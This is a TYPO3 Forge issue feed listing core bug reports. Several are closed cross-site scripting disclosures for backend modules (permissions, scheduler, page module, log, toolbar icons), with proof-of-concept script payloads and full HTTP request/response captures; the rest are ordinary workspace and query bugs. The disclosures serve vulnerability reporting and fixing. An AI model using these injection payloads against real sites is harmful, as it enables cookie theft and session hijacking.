TYPO3 Forge: Issueshttp://forge.typo3.org/http://forge.typo3.org/themes/typo3_forge/favicon/favicon.png?17058661692021-01-21T09:33:22ZTYPO3 Forge
Redmine TYPO3 Core - Bug #93335 (Closed): XSS in access permission modulehttp://forge.typo3.org/issues/933352021-01-21T09:33:22ZOliver Haderoliver.hader@typo3.org
<a name="Steps"></a>
<h2 >Steps<a href="#Steps" class="wiki-anchor">¶</a></h2>
<ul>
<li>having <code>be_groups.title</code> containing XSS</li>
</ul>
<pre>Group<img src="x" onerror="alert(1)"></pre>
<ul>
<li>open <code>System > Access</code> module for a particular page</li>
<li>click on groupname element</li>
<li>change to group containing XSS in title (prerequisite) & save</li>
<li>click on groupname element again</li>
<li>change to different group</li>
<li>click on "x" icon in order to revert change</li>
</ul>
<p>XSS is executed</p>
<a name="Reasons"></a>
<h2 >Reasons<a href="#Reasons" class="wiki-anchor">¶</a></h2>
<ul>
<li><a class="external" href="https://github.com/TYPO3/TYPO3.CMS/blob/master/Build/Sources/TypeScript/beuser/Resources/Public/TypeScript/Permissions.ts#L84">https://github.com/TYPO3/TYPO3.CMS/blob/master/Build/Sources/TypeScript/beuser/Resources/Public/TypeScript/Permissions.ts#L84</a></li>
</ul>
<pre>buttonSelector.innerHTML = groupnameHtml;</pre> TYPO3 Core - Bug #91334 (Closed): XSS in jQuery <3.5.0http://forge.typo3.org/issues/913342020-05-07T14:20:43ZOliver Haderoliver.hader@typo3.org
<p><a class="external" href="https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/">https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/</a></p> TYPO3 Core - Bug #84591 (Closed): XSS in ToolbarItems icon renderinghttp://forge.typo3.org/issues/845912018-04-04T08:24:34ZOliver Haderoliver.hader@typo3.org
<blockquote>
<p>Today i build for a customer a CacheManipulateClass to flush a few news caches. (Please do not judge these flush cache way. I know about clearCacheCmd)</p>
<p>Context: Regular be login and a sitepackage extension which register this class.</p>
<p>Proof of Concept: My class add this identifier</p>
</blockquote>
<pre>
/**
* @param array $cacheActions
* @param array $optionValues
*
* @return void
*/
public function manipulateCacheActions(&$cacheActions, &$optionValues)
{
$iconFactory = GeneralUtility::makeInstance(IconFactory::class);
$cacheActions[] = [
'id' => 'news_clear_cache',
'title' => 'Flush news caches',
'description' => 'Clear fluid cache for frontend pages with news',
'href' => (new UriBuilder())->buildUriFromRoute('news_clear_cache'),
'icon' => '<script>alert(document.cookie);</script>'
];
}
</pre>
<blockquote>
<p>In TYPO3 7.6.x the Cache manipulator hast he option „icon“ which will be handled at TYPO3/v7/typo3/sysext/backend/Classes/Backend/ToolbarItems/ClearCacheToolbarItem.php<br />In the function getDropdown (line 160) the function called $cacheAction[‚icon‘] without htmlspecialchars().</p>
</blockquote> TYPO3 Core - Bug #82079 (Closed): XSS in schedulerhttp://forge.typo3.org/issues/820792017-08-10T15:39:53ZOliver Haderoliver.hader@typo3.org
<p>I would like to inform you about security issue that I have found on the plugin SCHEDULER of the cms TYPO3 (checked on version 8.7.3), specifically it is accessible in the "Scheduler" section of the Backend administrative console.</p>
<p>The plugin Scheduler of TYPO3 is resulted vulnerable to Reflected Cross-Site Scripting, for the requests to Add or Edit a task, specifically on the 2 parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D".</p>
<p>Technical Details
=================<br />Below is descripted the scenario to reproduce the security issue.</p>
<p>Proof of Concept:<br />To replicate the issue an authenticated user (with permission to create/edit tasks) have to click the button "Add-Task" or "Edit-Task" in the Scheduler area.<br />And so is sufficient to grab the request which is being passed to the server and add the payloads in the 2 vulnerable parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D", so the submitted payloads are replicated on the response.</p>
<p>EXAMPLE<br />Payloads: <br />krup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1<br />de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag</p>
<p>ORIGINAL REQUEST:<br />----------------------------------<br />POST /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add HTTP/1.1<br />Host: X.X.X.X<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 479<br />Referer: <a class="external" href="http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add">http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add</a><br />Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1</p>
<p>tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=1500887453&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save</p>
<p>PoC REQUEST:<br />-----------------------<br />GET /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add&tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=15008874533rup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save HTTP/1.1<br />Host: X.X.X.X<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Referer: <a class="external" href="http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add">http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add</a><br />Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1</p>
<p>PoC RESPONSE:<br />--------------------------<br />HTTP/1.1 200 OK<br />Date: Mon, 24 Jul 2017 09:35:42 GMT<br />Server: Apache/2.4.18 (Ubuntu)<br />Expires: 0<br />Last-Modified: Mon, 24 Jul 2017 09:35:42 GMT<br />Cache-Control: no-cache, must-revalidate<br />Pragma: no-cache<br />X-Frame-Options: SAMEORIGIN<br />Vary: Accept-Encoding<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 51666</p>
<p><!DOCTYPE html><br /><html><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br />[...]<br /><label>Task group</label></abbr></span><div class="form-control-wrap"><select name="tx_scheduler[task_group]" id="task_class" class="form-control"><option value="0" title=""></option></select></div></div></div><br /><div class="form-section"><div class="row"><div class="form-group col-sm-6" id="task_start_col"><label><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_start"><abbr class="t3-help-teaser">Start (HH:MM DD-MM-YYYY)</abbr></span></label><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_start_row-wrapper"><input name="tx_scheduler[start]_hr" value="20:48 11-08-2445" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_start_row"><input name="tx_scheduler[start]" value="15008874533rup3z"><script>alert(1)</script>yflbjwmu6m1" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_start_row"><span class="fa fa-calendar"></span></label></span></div></div></div><br /><div class="form-group col-sm-6" id="task_end_col"><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_end"><abbr class="t3-help-teaser"><label>End (HH:MM DD-MM-YYYY)</label></abbr></span><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_end_row-wrapper"><input name="tx_scheduler[end]_hr" value="" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_end_row"><input name="tx_scheduler[end]" value="de6gi"><script>alert(2)</script>h3wq9ysmjag" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_end_row"><span class="fa fa-calendar"></span></label></span></div></div></div></div></div><br />[...]</p>
<p>Attached a screenshot of the PoC to better illustrate the vulnerability.</p>
<p>Vulnerable Versions:<br />TYPO3 8.7.3 and earlier</p>
<p>Checked on TYPO3/8.7.3</p>
<p>I have not received your response for the other 2 previous reporting (I hope to receive at least a response from you). Anyway I am always available if you need further explanations, kind regards.</p> TYPO3 Core - Bug #82077 (Closed): XSS in page modulehttp://forge.typo3.org/issues/820772017-08-10T15:35:29ZOliver Haderoliver.hader@typo3.org
<p>For the attention of the TYPO3 security team,</p>
<p>I would like to inform you about a security issue that I have found on the cms TYPO3 (checked on versions 8.7.3 and 6.2.30).</p>
<p>Specifically that versions of TYPO3 are vulnerable to a Reflected Cross-Site Scripting in the "Edit Page" area of the Backend administrative console, for the pages which are configured to show the content from other pages.</p>
<p>Technical Details
=================<br />Below is descripted the scenario to reproduce the security issue.</p>
<p>Prerequisite - Configure a page to show content from another page: in the home Backend administrative console select "Page" from the left panel, then select a site page in the tree view on the side and go to the "Edit Page". After select the "Appaerance" tab and click the "Page" button in the "Replace Content" section in order to add any content to that page and finally save it.</p>
<p>At this point in the "Edit Page" area for the aforementioned page will appear a blue rectangle with inside a link with the label "Page uses content from ...", and this link is affected by the reflected XSS issue.</p>
<p>Proof of Concept:<br />To replicate the issue is sufficient to click the aforementioned new link (for the 8.7.3 it have the format: "/typo3/index.php?M=web_layout&moduleToken=<TOKEN-VALUE>&id=<ID-VALUE>").</p>
<p>And so grab the GET request which is being passed to the server and add the payload in the URL query, so the submitted payload is reflected on the correspondent response body.</p>
<p>EXAMPLE (attached there is a screenshot of the PoC)<br />Payload: &xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E</p>
<p>ORIGINAL REQUEST:<br />--------------------------------<br />GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2 HTTP/1.1<br />Host: X.X.X.X<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />If-Modified-Since: Wed, 12 Jul 2017 07:20:31 GMT</p>
<p>PoC REQUEST:<br />------------<br />GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2&xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1<br />Host: X.X.X.X<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1</p>
<p>PoC RESPONSE:<br />-------------<br />HTTP/1.1 200 OK<br />Date: Wed, 12 Jul 2017 08:15:06 GMT<br />Server: Apache/2.4.18 (Ubuntu)<br />Expires: 0<br />Last-Modified: Wed, 12 Jul 2017 08:15:06 GMT<br />Cache-Control: no-cache, must-revalidate<br />Pragma: no-cache<br />X-Frame-Options: SAMEORIGIN<br />Vary: Accept-Encoding<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 41399</p>
<p><!DOCTYPE html><br /><html><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br />[...]<br /><div class="callout callout-info"><div class="media"><div class="media-left"><span class="fa-stack fa-lg callout-icon"><i class="fa fa-circle fa-stack-2x"></i><i class="fa fa-info fa-stack-1x"></i></span></div><div class="media-body"><h4 class="callout-title">page1</h4><div class="callout-body"><br /> Page uses content from this page: <a href="/typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=1&xss"><script>alert('xss')</script>=">page1 (PID 1)</a><br /></div></div></div></div><br />[...]</p>
<p>Vulnerable Versions:<br />TYPO3 8.7.3 and earlier</p>
<p>Checked on:<br />TYPO3/8.7.3 <br />TYPO3/6.2.30 (for the 6.2.x versions the affected link is "/typo3/sysext/cms/layout/db_layout.php?id=1&clear_cache=1")</p> TYPO3 Core - Bug #78743 (Rejected): Wrong translation behavior for pages/pages_language_overlayhttp://forge.typo3.org/issues/787432016-11-18T13:30:30ZOliver Haderoliver.hader@typo3.org
<ol>
<li>on localizing a page, references of <code>pages.media</code> are not copied to <code>pages_language_overlay.media</code> in DataHandler if <code>localizeChildrenAtParentLocalization</code> is defined in TCA</li>
<li>RootlineUtility is not capable of resolving overlays correctly, ignores <code>l10n_mode</code> and uses custom reference queries -> RelationHandler could be used here</li>
</ol> TYPO3 Core - Bug #73502 (Closed): Workspace Module continiously reloadinghttp://forge.typo3.org/issues/735022016-02-16T18:50:43ZOliver Haderoliver.hader@typo3.org
<p>Since <a class="changeset" title="[TASK] Use getAbsoluteWebPath instead of extRelPath In order to be more flexible for path resolv..." href="http://forge.typo3.org/projects/typo3cms-core/repository/1749/revisions/2f0a9521b343f757b543a9f8f2ac1ba9d06a69e2">2f0a9521b343f757b543a9f8f2ac1ba9d06a69e2</a> the workspace module is continiously reloading.</p> TYPO3 Core - Bug #72475 (Closed): XSS in belog modulehttp://forge.typo3.org/issues/724752015-12-30T13:23:09ZOliver Haderoliver.hader@typo3.org
<p>The belog module, accessible for admin users, is vulnerable for XSS.</p>
<p>Requirements</p>
<p>a) create a backend user having the name <pre>te<b>st</b></pre><br />b) create a workspace record having the title <pre>work<b>space</b></pre></p>
<p>PoC</p>
<ul>
<li>switch to the created user</li>
<li>switch to the create workspace</li>
<li>modify or create any content</li>
<li>open the log at System>Log and see the unescaped contents of the user and workspace</li>
</ul> TYPO3 Core - Task #59116 (Accepted): Workspace module shows unmodified valueshttp://forge.typo3.org/issues/591162014-05-26T13:14:13ZOliver Haderoliver.hader@typo3.org
<p>The workspace module shows field values that have not been modified by a user. This can be reproduced by e.g. creating a new text with images element in a workspace, but without any image.</p>
This can be enhanced by using better defaults for records:
<ul>
<li>NULL vs. empty string for the "image" field for example</li>
<li>skipping empty and system values in the workspace module view</li>
</ul> TYPO3 Core - Epic #58282 (Closed): Workspaces Workpackage #2http://forge.typo3.org/issues/582822014-04-28T10:47:28ZOliver Haderoliver.hader@typo3.orgTYPO3 Core - Epic #54851 (Closed): WP: Workspaces IRRE & MM bugfixeshttp://forge.typo3.org/issues/548512014-01-08T22:08:22ZOliver Haderoliver.hader@typo3.org
<p>The import and export functionality is available since the beginning of TYPO3 CMS. This backend module mostly relies on the internal DataHandler/TCEMain system of TYPO3. For TYPO3 6.2 LTS, the Core Team needs to improve the handling of the IRRE and MM relations within the import and export process.<br />Additionally, the import / export module must be able to handle exports which were generated in a pre-FAL-version of TYPO3 (e.g. like the last LTS Version 4.5) in order to be able to import directly to the FAL.<br />Since importing and exporting large sites via a web-backend leads to problems in runtime and memory limits, a CLI Module must be added.</p>
<p>Recent development can be found here:<br /><a class="external" href="https://github.com/ohader/TYPO3.CMS/commits/integration">https://github.com/ohader/TYPO3.CMS/commits/integration</a> (integration branch)<br /><a class="external" href="https://github.com/ohader/TYPO3.CMS/commits/bugfixes">https://github.com/ohader/TYPO3.CMS/commits/bugfixes</a> (development branch)</p> TYPO3 Core - Bug #50210 (Closed): Width of action column is wronghttp://forge.typo3.org/issues/502102013-07-20T09:09:23ZOliver Haderoliver.hader@typo3.org
<p>The width of the action column in the workspaces module is wrong.<br />5 icons with a width of 16px each need to be displayed (= 80px).</p>
<p>Before:<br /><img src="http://forge.typo3.org/attachments/download/24462/50210_before.png" alt="" loading="lazy" /></p>
<p>After:<br /><img src="http://forge.typo3.org/attachments/download/24463/50210_after.png" alt="" loading="lazy" /></p> TYPO3 Core - Task #45676 (Rejected): Workspace references are not consideredhttp://forge.typo3.org/issues/456762013-02-20T21:32:35ZOliver Haderoliver.hader@typo3.org
<p>Workspace references for MM and IRRE records are not considered, since only the UID of the live record is considered (due to overlays).<br />Since this might(!) work in most cases for existing records that get modified in a workspace, it does not not for records that are newly created. In this case, the "live record" is a workspace placeholder without any data.</p>
<p>MM and IRRE always need to use the most specific UID in references, which is the versioned record in this case.</p> TYPO3 Core - Bug #39155 (Closed): Warning on fetching undefined category definitionshttp://forge.typo3.org/issues/391552012-07-21T13:29:23ZOliver Haderoliver.hader@typo3.org
<p>Calling t3lib_category_Registry::getDatabaseTableDefinition() for an extension that does not register any categories, will cause a PHP Warning.</p>
<p>PHP Warning: Invalid argument supplied for foreach() in t3lib/category/Registry.php line 150</p> TYPO3 Core - Bug #36841 (Closed): Wrong query in RecordCollectionRepositoryhttp://forge.typo3.org/issues/368412012-05-04T13:11:56ZOliver Haderoliver.hader@typo3.org
<p>If t3lib_collection_RecordCollectionRepository::queryMultipleRecords() is called without any argument the SQL statement is wrong since t3lib_BEfunc::deleteClause() starts with "AND".</p>